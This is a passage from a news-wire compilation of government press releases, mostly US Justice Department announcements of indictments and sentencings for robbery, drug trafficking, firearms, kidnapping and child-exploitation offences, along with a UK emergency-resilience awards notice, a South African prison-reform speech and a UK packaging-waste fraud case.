    Today’s indictment charges North with fourteen counts of Hobbs Act robbery, one count of attempted Hobbs Act robbery, fourteen counts of brandishing a firearm in furtherance of a crime of violence, and one count of being a felon in possession of a firearm.

    The federal indictment alleges North committed the robberies between July 26, 2024, and Sep. 21, 2024.  North is alleged to have brandished a firearm during each of the robberies.

    Under federal law, it is illegal for anyone who has been convicted of a felony to be in possession of any firearm or ammunition.  North has a prior felony conviction for unlawful possession of a firearm.

    The charges contained in this indictment are simply accusations, and not evidence of guilt. Evidence supporting the charges must be presented to a federal trial jury, whose duty is to determine guilt or innocence.

    Under federal statutes, North is subject to a sentence of up to life in federal prison without parole.  Brandishing a firearm during a crime of violence carries a mandatory minimum sentence of seven years in federal prison without parole.  The maximum statutory sentence is prescribed by Congress and is provided here for informational purposes, as the sentencing of the defendant will be determined by the court based on the advisory sentencing guidelines and other statutory factors. A sentencing hearing will be scheduled after the completion of a presentence investigation by the United States Probation Office.

    This case is being prosecuted by Special Assistant U.S. Attorney Jessica L. Jennings.  It was investigated by the FBI, Kansas City, Missouri Police Department, Raytown, Missouri Police Department, and Independence, Missouri Police Department.

    Project Safe Neighborhoods

    This case is part of Project Safe Neighborhoods (PSN), a program bringing together all levels of law enforcement and the communities they serve to reduce violent crime and gun violence, and to make our neighborhoods safer for everyone. On May 26, 2021, the Department launched a violent crime reduction strategy strengthening PSN based on these core principles: fostering trust and legitimacy in our communities, supporting community-based organizations that help prevent violence from occurring in the first place, setting focused and strategic enforcement priorities, and measuring the results.


  • MIL-OSI Security: Two Springfield, Missouri, Men Sentenced for Methamphetamine Conspiracy

    Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)

    SPRINGFIELD, Mo. – Two men from Springfield, Mo., were sentenced in federal court for their roles in a conspiracy to distribute large quantities of methamphetamine in the Springfield area.

    Erik C. Foster, 43, was sentenced by U.S. District Judge Brian C. Wimes, to 215 months in federal prison without parole, to be followed by 5 years of supervised release. Foster pleaded guilty on Dec. 16, 2024.

    Tilton Chase Tate, 41, was sentenced by U.S. District Judge Brian C. Wimes, to 146 months in federal prison without parole, to be followed by 5 years of supervised release. Tate pleaded guilty on October 15, 2024.

    Foster and Tate were charged, along with other individuals, in a 24-count superseding indictment on July 25, 2023, for their roles in a drug conspiracy that lasted from Dec. 2020 to Oct. 2022.

    Foster admitted to purchasing and delivering methamphetamine for other conspirators to distribute in Southwest Missouri. During the course of the conspiracy, law enforcement seized well over 50 grams of methamphetamine from members of the conspiracy.

    According to court records, on Sep. 10, 2022, officers with the Republic, Mo. Police Department located two plastic bags containing at least 844 grams of methamphetamine from inside a speaker during a traffic stop where Foster was the passenger. Foster told officers that he had picked up the methamphetamine in Joplin and was taking it to Springfield to deliver it to a co-conspirator for distribution.

    On Oct. 12, 2022, deputies with the Greene County, Mo., Sheriff’s Office seized a small plastic bag of what appeared to be black tar heroin, a backpack containing 70 grams of methamphetamine, and over $11,960 in cash from Foster during a traffic stop. During a post-Miranda interview, Foster told officers that he was taking the backpack to a co-conspirator for distribution and that he had made six or seven similar trips to deliver methamphetamine.

    Tate admitted to possessing and distributing methamphetamine to others as part of the conspiracy.

    On Oct. 19, 2021, during a traffic stop, a Springfield, Mo. Police Department (SPD) detective seized over 440 grams of methamphetamine from Tate.

    On April 14, 2022, while executing a search warrant for Tate’s residence, SPD officers located a Ruger LCP 380 handgun and a Stoeger Arms, STR 9C 9mm handgun, as well as miscellaneous pills and suspected methamphetamine.

    Later in April, during a post-Miranda interview, Tate admitted to purchasing the methamphetamine seized during the Oct. traffic stop from a co-conspirator. He estimated that he was selling a pound of methamphetamine each week.

    This case is being prosecuted by Assistant U.S. Attorney Stephanie L. Wan. It was investigated by the Bureau of Alcohol, Tobacco, Firearms, and Explosives, the Federal Bureau of Investigation, the Greene County, Mo., Sheriff’s Office, the Missouri State Highway Patrol, the Republic, Mo., Police Department, and the Springfield, Mo., Police Department.

    Organized Crime and Drug Enforcement Task Force

    This case is part of an Organized Crime Drug Enforcement Task Forces (OCDETF) operation. OCDETF identifies, disrupts, and dismantles the highest-level criminal organizations that threaten the United States using a prosecutor-led, intelligence-driven, multi-agency approach. Additional information about the OCDETF Program can be found at https://www.justice.gov/OCDETF.


  • MIL-OSI Security: Kansas City Man Sentenced to 30 Years for Fentanyl and Methamphetamine Conspiracy

    Source: Federal Bureau of Investigation (FBI) State Crime Alerts (b)

    KANSAS CITY, Mo. – A Kansas City, Mo., man was sentenced in federal court today for his role in a conspiracy to distribute fentanyl, methamphetamine, and heroin and for possession of firearms in furtherance of that conspiracy.

    Codi J. Monteer, 38, was sentenced by U.S. District Judge D. Greg Kays to 30 years in federal prison without parole.

    On Oct. 8, 2024, Monteer pleaded guilty to one count of conspiracy to distribute fentanyl, methamphetamine, heroin, and marijuana; one count of maintaining a drug involved premises; one count of possession of firearms in furtherance of the drug conspiracy; and one count of being a felon in possession of firearms.

    Monteer’s participation in the drug trafficking conspiracy lasted approximately one year and he was responsible for conspiring with others to distribute at least 124 kilograms of methamphetamine; 700 grams of fentanyl (powder and pills); and 1.58 kilograms of heroin.  He was also in possession of several firearms used in furtherance of his drug trafficking.

    On one occasion, in March 2021, Monteer led members of the Kansas Highway Patrol on a high-speed pursuit that reached speeds of approximately 145 miles per hour. The pursuit did not conclude until two of the tires came off Monteer’s vehicle. During the pursuit, drugs were thrown from the vehicle.

    Monteer was an associate of Autumn Dicks, Ian Hazel, They Kelley, Marc Downs, and Jamison Hopson-Stephens.  Those individuals have already been sentenced for their roles within the conspiracy.  Monteer was also an associate of Davion Williams, Curtis Lewis, Daniel Anderson, and Aaron Dorsey in this conspiracy.  Those individuals have all pleaded guilty and are awaiting sentencing.

    This case is being prosecuted by Assistant U.S. Attorney Ashleigh A. Ragner.  It was investigated by the Kansas City, Mo. Police Department, FBI, United States Postal Inspection Service, and the Kansas State Highway Patrol.


  • MIL-OSI Security: Shiprock Man Charged in Connection to Stabbing Incident

    Source: Federal Bureau of Investigation (FBI) State Crime Alerts (c)

    ALBUQUERQUE – A Shiprock man has been charged with assault with a dangerous weapon after he allegedly stabbed a man multiple times during an altercation near Shiprock.

    According to court documents, on the night of April 19, 2025, Navajo Police Department officers responded to a 911 call reporting a stabbing in Shiprock, New Mexico. Officers located the victim who had sustained three stab wounds to his upper and lower back. The victim was transported to the hospital for emergency treatment.

    An investigation led by the FBI and Navajo Nation Criminal Investigators revealed that Matthew Charley, 29, an enrolled member of the Navajo Nation, approached the victim and two witnesses. After a brief verbal exchange, the witnesses left the area, leaving Charley and the victim alone. When the witnesses returned a short time later, they found the victim had been stabbed. The victim identified Charley as his assailant.

    Law enforcement collected witness statements, obtained video evidence, and reviewed surveillance footage that corroborated the description and movements of the suspect.

    Screenshot of video showing Charley

    Charley is charged with assault with a dangerous weapon and will remain in custody pending trial, which has not yet been scheduled. If convicted of the current charges, Charley faces 10 years in prison.

    U.S. Attorney Ryan Ellison and Philip Russell, Acting Special Agent in Charge of the Federal Bureau of Investigation’s Albuquerque Field Office made the announcement today.

    The Farmington Resident Agency of the Federal Bureau of Investigation’s Albuquerque Field Office investigated this case with assistance from the Navajo Nation Police Department and Navajo Department of Criminal Investigations. Assistant U.S. Attorney Amy Mondragon is prosecuting the case.

    A criminal complaint is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.


  • MIL-OSI United Kingdom: Somerset Prepared Community Resilience Awards – nominations open

    Source: United Kingdom – Executive Government & Departments

    News story

    Somerset Prepared Community Resilience Awards – nominations open

    The Somerset Prepared partnership is now taking nominations for its annual awards which celebrate people who help their communities deal with emergencies.

    Lucie Reader of Pitcombe and last year’s award winner

    The Somerset Prepared partnership, including the Environment Agency, is searching for nominees for its next Community Resilience Awards.

    The nomination window opened on Sunday 11 May in celebration of this month’s Somerset Day.

    These awards recognise people and groups who have gone above and beyond to help their community be better able to deal with emergencies. 

    Awards will be presented in two categories: 

    • Group award – for community organisations demonstrating exceptional emergency planning or preparedness 

    • Individual award – for people who have made significant personal contributions to community resilience 

    Award winners will receive public recognition and vouchers for community activities. The awards will be presented by the Lord Lieutenant of Somerset, Mr Mohammed Saddiq at the annual Somerset Prepared Community Resilience Day, which will be held at Taunton Racecourse on Thursday, 15 October. At the free event, partners welcome local people to celebrate Somerset’s community emergency volunteers, with workshops, presentations, and equipment demonstrations. 

    The annual Somerset Prepared Community Resilience Day brings together key organisations including the Environment Agency, Somerset Rivers Authority and Somerset Council to help local communities strengthen their resilience against emergencies. Members of the public (or media) can reserve a place at the event by visiting Eventbrite.

    Dr Bel Deering, community engagement officer for Somerset Rivers Authority, said: 

    The incredible work of volunteers who help their communities before and during emergencies deserves our gratitude.

    They are our local heroes, and their courage and compassion deserve to be celebrated and shared as stories of hope for all of Somerset.

    Last year’s individual winner was Lucie Reader of Pitcombe, whose exceptional leadership led to all homes in her community being flood protected for future emergencies. The group winner was Nunney Parish Council, whose councillors supported their community by proactively working with residents to improve their resilience to flooding.    

    Emma Giffard, flood resilience engagement advisor for the Environment Agency, said:  

    On behalf of all the Somerset Prepared partners, we extend our sincere thanks and warmly encourage both groups and individuals to submit their nominations for the awards.

    Nominations for the award close on 15 September 2025.  

    Visit https://www.somersetprepared.org.uk/somerset-community-resilience-awards to submit a nomination.

    If you have any questions please contact somersetprepared@somerset.gov.uk or floodwessex@environment-agency.gov.uk.

    Background

    Somerset Prepared is a multi-agency partnership working closely with communities to deliver advice, support and training to help enhance local resilience to emergencies. The partnership is made up of many organisations able to provide advice, guidance and support to help you develop local initiatives that enhance resilience to emergencies. 

    Full membership includes: 

    • Avon & Somerset Police 

    • British Red Cross 

    • Community Council for Somerset 

    • Community Representatives 

    • Devon & Somerset Fire & Rescue Service 

    • Environment Agency  

    • Rotary International 

    • Safe South West (Treasurer) 

    • Somerset Council (Chair & Secretariat) 

    • Somerset Rivers Authority 

    • South Western Ambulance Service 

    • Spark Somerset


    Published 21 May 2025


  • MIL-OSI Security: Lackawanna, New York, Man Going to Prison for His Role in Kidnapping Conspiracy Attempting to Force Sister to Marry in Yemen

    Source: Federal Bureau of Investigation (FBI) State Crime Alerts (c)

    BUFFALO, N.Y. – U.S. Attorney Michael DiGiacomo announced today that Waleed Abughanem, 33, of Lackawanna, NY, who was convicted of misprision of felony, was sentenced to serve 36 months in prison by U.S. District Judge John L. Sinatra, Jr.

    Assistant U.S. Attorneys Charles M. Kruly and Maeve E. Huggins, who handled the case, stated that Abughanem is the son of Khaled Abughanem and the brother of Adham Abughanem. On September 8, 2021, Khaled and Adham Abughanem flew from Buffalo, NY, to Guadalajara, Mexico to kidnap Victim 1, who is the daughter of Khaled and the sister of Adham and Waleed. Between September 10, 2021, and April 6, 2023, Waleed, Khaled and Adham Abughanem conspired to transport Victim 1 from the Western District of New York to Cairo, Egypt, and then to Sanaa, Yemen, where they confined Victim 1 for approximately 16 months with the purpose of marrying her to a man not of her choosing.

    Waleed Abughanem knew Victim 1 was being held involuntarily, and during some of this period, he was present in Yemen. When he was not present in Yemen, Waleed Abughanem instructed his wife to monitor and supervise Victim 1. In December 2022, Waleed Abughanem traveled from Yemen to the United States. When questioned by U.S. Customs and Border Protection as to the whereabouts of his siblings, Waleed Abughanem told the CBP Officer that the Victim was in the United States. By making a false statement, Waleed Abughanem concealed that Victim 1 had been kidnapped and was being involuntarily held in Yemen.

    Khaled and Adham Abughanem were previously convicted by a federal jury at trial and are awaiting sentencing.

    Waleed Abughanem’s sentencing is the result of an investigation by the Federal Bureau of Investigation, under the direction of Special Agent-in-Charge Matthew Miraglia, and the U.S. Department of State’s Diplomatic Security Service, under the direction of Diplomatic Security Director Carlos Matus and Deputy Assistant Secretary Paul Houston. Additional assistance was provided by the Lackawanna Police Department, under the direction of Chief Mark Packard, Customs and Border Protection, under the direction of Director of Field Operations Rose Brophy, and CBP in Boston, Massachusetts.


  • MIL-OSI Security: Mexican National Indicted for Allegedly Attempting to Smuggle Over 1100 Pounds of Meth into the U.S. Through Eagle Pass

    Source: Office of United States Attorneys

    DEL RIO, Texas – A federal grand jury in Del Rio returned an indictment charging a Mexican national with four counts related to methamphetamine trafficking.

    According to court documents, Veronica Sanchez-Pineda, 46, of Piedras Negras, Coahuila, Mexico, approached the Eagle Pass Port of Entry in a pickup truck on April 20, allegedly giving Customs and Border Protection officers a negative declaration for contraband including narcotics. A secondary inspection allegedly resulted in the discovery of a crystal-like substance inside an auxiliary tank in the bed of the truck. The liquid was extracted and resulted in a positive test result for the properties of methamphetamine, a criminal complaint alleges. The total approximate weight of the alleged narcotic was 521.03 kg.

    The criminal complaint also alleges that Sanchez-Pineda consented to a search of her cell phone, which contained a text message about a “job” in Eagle Pass as well as screenshots of money transfers between the defendant and another individual. Sanchez-Pineda allegedly admitted to being involved in illegal activity regarding the contents of the auxiliary tank and that she was being compensated in Mexican Pesos.

    Sanchez-Pineda is charged with one count of conspiracy to possess with intent to distribute methamphetamine; one count of possession of methamphetamine with intent to distribute; one count of conspiracy to import methamphetamine; and one count of importation of methamphetamine. She was arrested and made her initial court appearance April 24 before U.S. Magistrate Judge Matthew H. Watters of the U.S. District Court for the Western District of Texas. If convicted, Sanchez-Pineda faces 10 years to life in prison and up to a $10 million fine. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors.

    Acting U.S. Attorney Margaret Leachman for the Western District of Texas made the announcement.

    Homeland Security Investigations is investigating the case.

    Assistant U.S. Attorney Warsame Galaydh is prosecuting the case.

    This case is part of Operation Take Back America, a nationwide initiative that marshals the full resources of the Department of Justice to repel the invasion of illegal immigration, achieve the total elimination of cartels and transnational criminal organizations (TCOs), and protect our communities from the perpetrators of violent crime. Operation Take Back America streamlines efforts and resources from the Department’s Organized Crime Drug Enforcement Task Forces (OCDETFs) and Project Safe Neighborhood (PSN).

    An indictment is merely an allegation and all defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.


  • MIL-OSI Security: Charlotte Man Sentenced For Illegal Firearm Possession After Assaulting Two U.S. Postal Service Mail Carriers On The Same Day

    Source: Office of United States Attorneys

    CHARLOTTE, N.C. – Dujuan Marquise McNeil, 39, of Charlotte, was sentenced yesterday to 10 years in prison followed by three years of supervised release for illegal possession of a firearm after he assaulted two U.S. Postal Service mail carriers on the same day, announced Russ Ferguson, U.S. Attorney for the Western District of North Carolina.

    Rodney Hopkins, Inspector in Charge of the Atlanta Division of the U.S. Postal Inspection Service (USPIS), which oversees Charlotte, joins U.S. Attorney Ferguson in making today’s announcement.

    “My office will continue to aggressively prosecute those that threaten or harm our postal workers,” said U.S. Attorney Ferguson.  “Postal workers are hard-working Americans that are vital to our way of life and essential to our system of commerce.”

    “A core mission of the U.S. Postal Inspection Service is to provide a safe environment for Postal employees and the American public. Illegal weapons threaten the safety of all our communities,” said Inspector in Charge Hopkins. “We extend our utmost appreciation to our law enforcement partners and the U.S. Attorney’s Office in the Western District of North Carolina for supporting our mission and bringing this investigation to a successful conclusion.”

    According to court records, on June 1, 2023, McNeil used firearms to threaten two U.S. Postal Service mail carriers. In both instances, McNeil used his vehicle to block a mail truck before threatening the carrier inside with his guns. McNeil believed someone with the post office stole an unidentified item from his package. McNeil also went to a local post office to complain about the alleged theft. Clerks at that office reported that McNeil stated he would kill whichever carrier was responsible for the alleged theft.

    During the investigation, law enforcement determined that McNeil had multiple prior criminal convictions, including Possession of a Firearm by a Felon, Discharge of a Weapon into Occupied Property, and Domestic Violence Protective Order Violation, and was prohibited from possessing firearms.

    On June 14, 2023, a federal search warrant was executed at McNeil’s residence, where law enforcement found and seized multiple firearms, including: three 9mm semi-automatic pistols (one fitted with an extended magazine); a Polymer 80 9mm semi-automatic pistol (commonly referred to as a “ghost gun”) with an extended magazine; an AR15 semi-automatic rifle; multiple magazines; and nearly 300 rounds of ammunition.

    On October 30, 2024, McNeil pleaded guilty to possession of a firearm by a convicted felon. He is currently in federal custody and will be transferred to the custody of the Federal Bureau of Prisons.

    In making today’s announcement U.S. Attorney Ferguson commended USPIS for their work in this investigation and thanked the Bureau of Alcohol, Tobacco, Firearms and Explosives and the Charlotte Mecklenburg Police Department for their assistance. 

    The U.S. Attorney’s Office in Charlotte prosecuted the case.


  • MIL-OSI Security: Austin Felon Sentenced to 12 Years in Federal Prison for Firearm Possession

    Source: Office of United States Attorneys

    AUSTIN, Texas – An Austin man was sentenced in a federal court in Austin to 144 months in federal prison for one count of felon in possession.

    According to court documents, Steven Moreno Briseno, 38, was arrested by Austin Police when he surrendered during a barricaded standoff at his family’s residence on Nov. 30, 2023. Briseno had allegedly been under the influence of methamphetamine and got into an altercation with his wife, physically assaulting her and then fleeing on foot when officers arrived in response to a 911 call.

    Briseno ran into a vacant apartment across the street then sprinted back to his residence, where he barricaded himself inside. Briseno’s aggressive behavior escalated as he refused the officers’ commands to exit the residence, made comments about arming himself, and threatened to start shooting if the officers did not back away from his residence. Officers observed Briseno fashioning a tripod through a window and mounting a long rifle on top. He was also seen smoking from a glass pipe that resembled a meth pipe while he loaded numerous rounds into rifles, handguns, and at least one shotgun. Additionally, officers watched Briseno exit the residence with a gun in his hand while wearing a camouflaged tactical vest.

    When APD SWAT arrived on the scene, Briseno was instructed to exit the residence with his hands up and empty. Subsequently, he fired at least one round from one of his firearms from inside the residence to an unspecified location outside the residence. After several minutes of speaking via loudspeaker, Briseno surrendered to APD. Inside the residence, officers located numerous firearms, loaded magazines, and boxes of ammunition in plain view, including on top of the kitchen table and staged near the front door and multiple windows in the front of the house.

    Briseno had previously been convicted of multiple felonies, including burglary on Nov. 30, 2022. He pleaded guilty to one count of felon in possession of a firearm on Jan. 15, 2025.

    Acting U.S. Attorney Margaret Leachman for the Western District of Texas made the announcement.

    The Bureau of Alcohol, Tobacco, Firearms and Explosives and the Austin Police Department investigated the case.

    Assistant U.S. Attorney Grant Sparks prosecuted the case.


  • MIL-OSI Security: Silver Spring Man Pleads Guilty to “Sextortion” of More Than 100 Minors Located Throughout the United States and Abroad

    Source: Office of United States Attorneys

    Greenbelt, Maryland – Chase William Mulligan, 28, of Silver Spring, Maryland, pled guilty to two counts of producing child sexual abuse material in federal court. The charges are in connection with a scheme in which he met young girls through social media and internet chat rooms and eventually “sextorted” them.

    Specifically, through the scheme, Mulligan coerced at least 108 girls — ranging from ages 5-17 — to send him sexually explicit photographs and videos of themselves. When the girls told him they no longer wanted to send him sexually graphic images, Mulligan threatened to post the images online or come to their house.

    Kelly O. Hayes, U.S. Attorney for the District of Maryland, announced the guilty plea with Special Agent in Charge William J. DelBagno of the Federal Bureau of Investigation (FBI) – Baltimore Field Office.

    “Mulligan used manipulation, fear, and intimidation to exploit over 100 young victims. Now we must ensure that we send a clear message to Mulligan, and others, that those who abuse the most vulnerable members of our communities will pay a steep price,” Hayes said. “We’re committed to working with our law-enforcement partners to relentlessly pursue, prosecute, and bring to justice those who engage in these deplorable acts.”

    “Chase Mulligan is a depraved and dangerous predator. He used social media to target, viciously threaten, and horribly abuse more than 100 minor victims – one as young as five years old,” DelBagno said. “His abhorrent behavior is not diminished by the fact he was thousands of miles away and never met his victims, rather, it’s the opposite. Despite his distance, he presents a serious threat to any child he can access through the internet. The FBI works diligently every day to find and arrest predators like Mulligan so they can no longer prey on innocent children.”

    As detailed in the plea agreement, between at least 2019 and December 2023, Mulligan used numerous Snapchat, Discord, Roblox, Skype, Omegle, and Instagram accounts to target young girls. He convinced minors living in the United States, Canada, Denmark, Spain, Philippines, Australia, and United Kingdom to produce and send him sexually explicit images.

    Mulligan also directed minors to expose their genital areas and engage in sexual conduct. Additionally, Mulligan coerced multiple girls to urinate on camera, insert objects into their genitalia, and participate in sexual acts with dogs.

    After some victims informed Mulligan that they no longer wished to send him sexually explicit images, he threatened to publicly post the images or come to their homes. Mulligan wanted the victims to send more images depicting increasingly graphic sexual conduct.

    As part of his plea agreement, Mulligan must register as a sex offender in places where he resides, is an employee, and is a student, under the Sex Offender Registration and Notification Act.

    Mulligan is facing a mandatory minimum of 15 years and a statutory maximum of 60 years in federal prison. U.S. District Judge Theodore C. Chuang scheduled sentencing for Wednesday, August 27, at 2:30 p.m.

    This case was brought as part of Project Safe Childhood, a nationwide initiative launched in May 2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse.  Led by the United States Attorney’s Offices and the Criminal Division’s Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend, and prosecute individuals who sexually exploit children, and to identify and rescue victims.  For more information about Project Safe Childhood, visit www.justice.gov/psc. Click the “Resources” tab on the left side of the page to learn about Internet safety education.

    U.S. Attorney Hayes commended the FBI for its work in the investigation. Ms. Hayes also thanked Assistant U.S. Attorneys Megan S. McKoy and Elizabeth Wright who are prosecuting the case.

    For more information about the Maryland U.S. Attorney’s Office, its priorities, and resources available to help the community, please visit www.justice.gov/usao-md and https://www.justice.gov/usao-md/community-outreach.

    # # #

  • MIL-OSI Security: Mission Woman Sentenced to Federal Prison for Larceny and Failure to Appear

    Source: Office of United States Attorneys

    PIERRE – United States Attorney Alison J. Ramsdell announced today that U.S. District Judge Eric C. Schulte has sentenced a Mission, South Dakota woman convicted of Larceny and Failure to Appear. The sentencing took place on May 19, 2025.

    Kylie Leader Charge, age 19, was sentenced to eight months in federal prison, followed by three years of supervised release. Leader Charge was further ordered to pay a $200 special assessment to the Federal Crime Victims Fund and $1,000 in restitution.

    Leader Charge was indicted by a federal grand jury in February 2024. She pleaded guilty on February 20, 2025.

    The conviction for Larceny stemmed from an incident that occurred in November of 2023, within the Rosebud Sioux Indian Reservation, when Leader Charge and a co-defendant stole a vehicle near Mission, drove it in a reckless manner, and caused damage to the vehicle.

    Following her Indictment, Leader Charge was released on bond. On March 21, 2024, Leader Charge failed to appear for a bail review hearing as required by her bond conditions. She was subsequently indicted for Failure to Appear.

    These matters were prosecuted by the U.S. Attorney’s Office because the Major Crimes Act, a federal statute, mandates that certain violent crimes alleged to have occurred in Indian Country be prosecuted in Federal court as opposed to State court.

    These cases were investigated by the Rosebud Sioux Tribe Law Enforcement Services and the United States Marshals Service. Assistant U.S. Attorney Meghan N. Dilges prosecuted the cases.

    Leader Charge was immediately remanded to the custody of the U.S. Marshals Service. 

  • MIL-OSI Security: Missouri Registered Sex Offender Charged with Distributing and Receiving Child Pornography

    Source: Federal Bureau of Investigation FBI Crime News (b)

    KANSAS CITY, Mo. – A Kansas City, Mo., man was indicted by a federal grand jury on charges related to child pornography.

    According to an indictment returned this week, Jeffrey Lynn Petrie, 40, of Kansas City, Mo., was charged with one count of distributing child pornography over the internet in May 2024, and one count of receiving child pornography from Dec. 9, 2024, to Dec. 10, 2024.

    The indictment replaces a complaint originally filed on Friday, April 25, 2025. According to an affidavit filed in support of the criminal complaint, law enforcement officers received a Cybertip reporting that a user, “kinkypopper69,” was uploading video files depicting child sexual abuse materials. Petrie was later identified as the user “kinkypopper69.”

    On April 24, 2025, the FBI conducted a search at Petrie’s residence and seized a cell phone and other electronic devices.

    Petrie is a registered sex offender in Missouri based on prior convictions for child molestation in the 2nd degree.

    The charges contained in this indictment are simply accusations, and not evidence of guilt. Evidence supporting the charges must be presented to a federal trial jury, whose duty is to determine guilt or innocence.

    Under federal statutes, if convicted of distribution and receipt of child pornography, a prison sentence of not less than 15 years and not more than 40 years and a fine of up to $250,000 is authorized on each count. The maximum statutory sentence is prescribed by Congress and is provided here for informational purposes, as the sentencing of the defendant will be determined by the court based on the advisory sentencing guidelines and other statutory factors. A sentencing hearing will be scheduled after the completion of a presentence investigation by the United States Probation Office.

    This case is being prosecuted by Assistant U.S. Attorney Teresa A. Moore. This case was investigated by the Federal Bureau of Investigation, and the Franklin County, Missouri Sheriff’s Office.

    Project Safe Childhood

    This case was brought as part of Project Safe Childhood, a nationwide initiative launched in May 2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse. Led by the United States Attorneys’ Offices and the Criminal Division’s Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend, and prosecute individuals who sexually exploit children, and to identify and rescue victims. For more information about Project Safe Childhood, please visit www.usdoj.gov/psc. For more information about Internet safety education, please visit www.usdoj.gov/psc and click on the tab “resources.”

  • MIL-OSI Security: Shiprock Man Charged with Assault in Shooting

    Source: Federal Bureau of Investigation FBI Crime News (b)

    ALBUQUERQUE – A Shiprock man has been charged with assault with a dangerous weapon following a shooting incident outside a restaurant.

    According to court documents, Navajo Nation Police responded to a 911 call reporting that an individual was shot in the hand in front of the Little Caesars Restaurant in Shiprock. Officers located the suspect, identified as Terrold Tyler, 35, an enrolled member of the Navajo Nation, near the scene carrying a black backpack that contained a homemade firearm and five live shotgun shells. Tyler was detained without incident.

    Investigators determined that Tyler and the victim were involved in an argument behind the restaurant prior to the shooting. Tyler allegedly produced the homemade shotgun and shot the victim in the left hand. Paramedics responded to the scene, but the victim declined medical treatment. A social media video depicting Tyler with the firearm was also recovered as evidence.

    Tyler is charged with assault with a dangerous weapon and will remain in custody pending trial, which has not yet been scheduled. If convicted of the current charges, Tyler faces up to 10 years in prison.

    U.S. Attorney Ryan Ellison and Philip Russell, Acting Special Agent in Charge of the Federal Bureau of Investigation’s Albuquerque Field Office made the announcement today.

    The Farmington Resident Agency of the Federal Bureau of Investigation’s Albuquerque Field Office investigated this case with assistance from the Navajo Nation Police Department and Navajo Department of Criminal Investigations. Assistant U.S. Attorney Amy Mondragon is prosecuting the case.

    A criminal complaint is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.

  • MIL-OSI Africa: Government programmes do empower inmates – Minister Groenewald

    Source: South Africa News Agency

    Minister of Correctional Services, Dr Pieter Groenewald, says that the country’s Self-Sufficiency and Sustainability Strategic Framework (SSSF) not only creates employment opportunities for offenders in farms, bakeries, gardens, and abattoirs, but also empowers them.

    “Enabling them to produce their own food has not only empowered the offenders but also resulted in considerable savings for the South African government,” the Minister said.

    The Minister believes this demonstrates how the United Nations Standard Minimum Rules for the Treatment of Prisoners, known as the Nelson Mandela Rules, can be effectively implemented.

    The Minister believes that this is one of several successful examples demonstrating how the implementation of the Nelson Mandela Rules can lead to transformative outcomes. 

    These outcomes equip offenders with the necessary skills and experiences to become economically independent after their rehabilitation and reintegration into society.

    The Minister spoke at the 34th Session of the United Nations (UN) Commission on Crime Prevention and Criminal Justice (CCPCJ) held in Vienna, Austria.

    This came as the international community also celebrated the 10th anniversary of the rules.

    The revised Nelson Mandela Rules were adopted unanimously in December 2015 by the UN General Assembly and set out the minimum standards for good prison management, including ensuring that the rights of prisoners are respected. 

    The Minister also took the time to urge world leaders to honour the enduring legacy of President Nelson Mandela, who was in prison for 27 years for his activism against apartheid, and the ideals of dignity, justice, and human rights that he stood for.

    In addition, he called for the international community to advance a more just, inclusive, and rehabilitative approach to incarceration. 

    “In light of rising global prison populations, systemic overcrowding, and the urgent need for more humane and effective penal systems, the 10th Anniversary of the Nelson Mandela Rules provides a timely platform to underscore the importance of prison and penal reform.”

    He also took the time to acknowledge the commemoration of the 10th Anniversary of the Nelson Mandela Rules at the UN General Assembly High-Level Debate, scheduled for 13 June 2025. 

    The theme of the debate is “A Second Chance: Addressing the Global Prison Challenge.”

    The Minister expressed support for the Bangkok Rules, which complement the Nelson Mandela Rules by addressing the specific needs and circumstances of women in the criminal justice system, requiring gender-sensitive approaches to their treatment and rehabilitation.

    “Together, these two sets of international standards promote a more inclusive, equitable, and human rights–based correctional system that respects the dignity of all individuals,” he explained. 

    He congratulated Japan on successfully adopting the Model Strategies to Reduce Reoffending, which further supports the Nelson Mandela Rules by ensuring that rehabilitation and reintegration principles are effectively realised beyond prison walls.

    “We wish to express our sincere gratitude to the UNODC [United Nations Office on Drugs and Crime] for their efforts in promoting the practical application of the rules and encourage them to continue assisting Member States in seeking innovative ways to address prison management and penal reform.” 

    He concluded his talk by quoting Nelson Mandela, who aptly said, “No one truly knows a nation until one has been inside its jails. A nation should not be judged by how it treats its highest citizens, but its lowest ones.” – SAnews.gov.za

    MIL OSI Africa

  • MIL-OSI United Kingdom: Waste packaging company director pays high price in data fraud

    Source: United Kingdom – Executive Government & Departments

    News story

    Waste packaging company director pays high price in data fraud

    A Birmingham-based director and his company have been ordered to pay a Proceeds of Crime confiscation order, fines and costs totalling £476,995.

    An officer on inspection duty. Please note the photo is an example of EA’s work not directly from this case.

    This follows an Environment Agency investigation into fraudulent entry of waste packaging data.

    At Birmingham Crown Court on Friday 16 May 2025, Shaobo Qin, a director of EDU Case Ltd, pleaded guilty to fraud by false representation. He was given a 2 year prison sentence suspended for 18 months.

    Qin, age 42, of Sutton Coldfield, West Midlands, was also ordered to pay a Proceeds of Crime confiscation order of £255,057. He must pay within 2 months or face 3 years in prison.

    He was also disqualified as a director for 4 years and ordered to do 200 hours of unpaid work.

    His company, EDU Case Ltd of Portway Road, Rowley Regis, was fined £200,000. The Environment Agency were also awarded £21,995 in investigation costs.

    The court was told Qin’s company was a plastics and recycling exports enterprise. The offences were discovered by the Environment Agency towards the end of 2022.

    The company, orchestrated by Qin, was deliberately and systematically entering false data on to the Environment Agency’s National Packaging Waste Database (NPWD) for non-existent waste exports.

    This resulted in Qin receiving a benefit for himself and his company in the sum of approx. £255,000. He was arrested on Wednesday 10 January 2024, when he was interviewed by Environment Agency officers.

    EDU Case were accredited to carry out plastic packaging exports and able to issue “evidence” of that activity in the form of tonnage figures on the database.

    This evidence could be bought by businesses who are obliged to account for their plastic packaging waste under the Producer Responsibility Obligations (Packaging Waste) Regulations 2007.

    An audit conducted by Environment Agency officers in 2023 and information following that work identified discrepancies between the amount of waste exported and the amount of evidence issued. 

    By the end of 2022, the false entries represented nearly two-thirds of the business’ entire trade for that year.

    As part of that audit, a legal notice was served on Qin and the company in September 2023.

